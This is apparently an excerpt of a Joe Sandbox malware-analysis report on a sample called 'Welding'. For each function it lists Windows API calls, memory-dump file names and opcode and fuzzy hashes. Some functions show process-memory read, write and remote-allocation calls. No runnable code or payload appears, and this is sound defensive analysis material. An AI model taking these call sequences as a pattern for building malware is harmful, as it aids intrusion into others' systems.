MessageBoxW.USER32(?,?,?,?), ref: 001150A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001150BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001150C5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 58959b6d996e0e515fa1446c7b3d8b1b6ca760bde1b7d69d0e8f52548c3d6806
Instruction ID: e6d7f2da6f1205b48bf3a547cab235376a28118aa74785269403fff14eef4e67
Opcode Fuzzy Hash: 58959b6d996e0e515fa1446c7b3d8b1b6ca760bde1b7d69d0e8f52548c3d6806
Instruction Fuzzy Hash: 0C11E976908758ABC7059FA89C04AEF7FADAB89320F140265F928D37A1D77189C087F0

Function 00108E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 27e8d62f83216a6f29cb80ba0f47c900a6e8c1b8b5c19fe2cd28ac66f8541367
Instruction ID: 0bf767375e280ce89c7eadd9e0aeaecccf3fdf292543e02df3213cb7f2f29d0f
Opcode Fuzzy Hash: 27e8d62f83216a6f29cb80ba0f47c900a6e8c1b8b5c19fe2cd28ac66f8541367
Instruction Fuzzy Hash: C70169B4210604BFDB214FA6DC88D6B7FADEF8A754B100529FA89C3260DB71DC50CA60

Function 001157FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0011581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00115829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0011583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d33570721c4043bbf8e7f8b19c9a782c5506167a77ced53952f6a473a4dd4b14
Instruction ID: 0240e9d96794b08c50c14296aba0eddcc530209ff901396e077a678003b16f22
Opcode Fuzzy Hash: d33570721c4043bbf8e7f8b19c9a782c5506167a77ced53952f6a473a4dd4b14
Instruction Fuzzy Hash: E4015735C01A19DBCF08AFE6D848AEDBBB9BB4D711F014166E601B2150CB3095A0CBA1

Function 00107D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?,?,00108073), ref: 00107D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?), ref: 00107D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D8A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: b0b99e3c8695204434b4a3c423c00c518fe0794db11b01754ae4f54b7ee7f497
Instruction ID: df81bca8eb6ae3167a77ad1eafc3d8406f7ba003f779e74dbad52038e730adb2
Opcode Fuzzy Hash: b0b99e3c8695204434b4a3c423c00c518fe0794db11b01754ae4f54b7ee7f497
Instruction Fuzzy Hash: 0701B176A01215BBCB114F95DD04BA97BADEF48351F104014FD48D22A0D7B1ED40CBA0

Function 00108CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3b9127f4e706d8df0fe2ee47da71b669cf70cbbff663f4661f77416f1bdd903b
Instruction ID: 7de145469a4bbfe2904d719a4e1de22e1742f9c7c65550c82d205590af93eb91
Opcode Fuzzy Hash: 3b9127f4e706d8df0fe2ee47da71b669cf70cbbff663f4661f77416f1bdd903b
Instruction Fuzzy Hash: 0FF03135204204AFDB110FE59C89E673B6DEF5A754B104515FA85861A0CBB1DC41DB60

Function 00108D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 99a8904a73d719d18b589420898af5eb8541f10f7656ce54da764d83d201f780
Instruction ID: eea1cf2c29e9c04950dd10854c594a0ab33bce274dbb6f75ec561b529e38c0aa
Opcode Fuzzy Hash: 99a8904a73d719d18b589420898af5eb8541f10f7656ce54da764d83d201f780
Instruction Fuzzy Hash: FAF0A434214204AFD7220FA5DC88F673B6CEF4A754F140215FA88C31A0CBB0DD40DB60

Function 0010CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0010CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 0010CDA7
MessageBeep.USER32(00000000), ref: 0010CDBF
KillTimer.USER32(?,0000040A), ref: 0010CDDB
EndDialog.USER32(?,00000001), ref: 0010CDF5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 7d4984163788a981bba90c688fc45e1de4d62001ff62f0ea1d354d01553eb827
Instruction ID: e90cb710422aaf69e971ce4d98cb58fa3d033c4ca5d6363433ed41634c4c1017
Opcode Fuzzy Hash: 7d4984163788a981bba90c688fc45e1de4d62001ff62f0ea1d354d01553eb827
Instruction Fuzzy Hash: E201A274500708ABEB219B61DC8EBA67B78FB05701F010669A6C2A14E1DBF0A9948FC0

Function 000B178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 000B179B
StrokeAndFillPath.GDI32(?,?,000EBBC9,00000000,?), ref: 000B17B7
SelectObject.GDI32(?,?), ref: 000B17CA
DeleteObject.GDI32 ref: 000B17DD
StrokePath.GDI32(?), ref: 000B17F8

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 84160b963a24760f337115677af62e9294e93e9db31571619f52821fd5431bb9
Instruction ID: 59f6472ec2026bf9eb541ea850ad1a689a8f5c14ccd1a0ed418c5fe1f776fb56
Opcode Fuzzy Hash: 84160b963a24760f337115677af62e9294e93e9db31571619f52821fd5431bb9
Instruction Fuzzy Hash: A0F0193000C348EBDB665F26EC0CB993BB4AB06362F488214F92D869F1CB3089D6DF51

Function 0011C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0011CA75
CoCreateInstance.OLE32(00143D3C,00000000,00000001,00143BAC,?), ref: 0011CA8D

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

CoUninitialize.OLE32 ref: 0011CCFA

Strings

.lnk, xrefs: 0011CA09, 0011CA31, 0011CA3B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: fec1d7d770cd06dea7ed40ecf3e8f95ffc9b9328af812501e765e8b32033aa5b
Instruction ID: 0a5ecbd776e9cbb9dde7081ad09066f94b44055cdc2814a82cf7f257b669d1d5
Opcode Fuzzy Hash: fec1d7d770cd06dea7ed40ecf3e8f95ffc9b9328af812501e765e8b32033aa5b
Instruction Fuzzy Hash: CBA1F771508205AFD300EF64C891EEBB7E8EF95718F00492CB555972A3EB70EA49CB92

Function 000D523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000D52CD

Part of subcall function 000E0320: __87except.LIBCMT ref: 000E035B

Strings

pow, xrefs: 000D52A5, 000D52C2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
Instruction ID: 3004928064f4da41ec3aabe9e93f7f54caab7121ac56461bec048c1e2afadd61
Opcode Fuzzy Hash: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
Instruction Fuzzy Hash: F151C0F1A097418BCB517729CE413BE37E49B01752F304D1AF8C5553EAEEB48DC89A62

Function 000D0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 000D0690
#, xrefs: 000D0699

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
Instruction ID: 886ccc3751e82f8097957eae5739d4e28d32c26102f45f78cc5206d783321f79
Opcode Fuzzy Hash: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
Instruction Fuzzy Hash: 23511175904346CFDB25DF28C884AFE7BA4EF5A310F148056F8959B2D1C770ACA2CB60

Function 000CCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000CCFC2
_memmove.LIBCMT ref: 000CD060
_memset.LIBCMT ref: 000CD084

Strings

ERCP, xrefs: 000CCF2D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
Instruction ID: 2df0d83b3483163b2948fa1d811986224fe89b5d1aba69f1623f715178e10a84
Opcode Fuzzy Hash: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
Instruction Fuzzy Hash: F451A2719007099BDB24CF68C881BEEBBE4EF04314F24857FE48ADB291E775A585CB80

Function 0010A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00111CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E4E,?,?,00000034,00000800,?,00000034), ref: 00111CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0010A3F7

Part of subcall function 00111C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00111CB0

Part of subcall function 00111BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00111C08
Part of subcall function 00111BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C18
Part of subcall function 00111BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A4B1

Strings

@, xrefs: 0010A4C9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
Instruction ID: 89e3a1942e4e5a10b94a635ef5e7000dcf870a8b68b87f44b04a4fb745a43d00
Opcode Fuzzy Hash: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
Instruction Fuzzy Hash: 10414B7690121CBFCB14DBA4CC85BDEB7B8EF49300F0440A5FA45A7180DBB06E85CBA1

Function 001379FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00137A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00137A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00137ABE

Strings

SysMonthCal32, xrefs: 00137A51

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
Instruction ID: 8493e7db2d8cea0368b79c7fdac4ee95d941aeb4166f5a925bb30dde8a5d06fe
Opcode Fuzzy Hash: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
Instruction Fuzzy Hash: B0219172604218AFDF258F54CC86FEE3B69EF48724F150114FE156B1D0DB71A9919B90

Function 001381B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0013826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0013827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00138284

Strings

msctls_updown32, xrefs: 001381E9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
Instruction ID: 6356b60b09232866bf2d4fdd90c38a1e3f6c6214f49a48ded031e57fdb4eecc5
Opcode Fuzzy Hash: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
Instruction Fuzzy Hash: A1218EB5604209AFDB10DF58CCC5DA737EDEB5A3A4F080059FA059B2A1CB70EC51CBA0

Function 001372D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00137360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00137370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00137395

Strings

Listbox, xrefs: 0013732D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
Instruction ID: bd81a6e112315464f240c7e0b0a4c332dada78972faefdaaeaad65faa93e6c50
Opcode Fuzzy Hash: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
Instruction Fuzzy Hash: 2C21BE72604118BFDF268F54CC85EBF3BAAEB89764F018124FA459B1E0C771AC519BA0

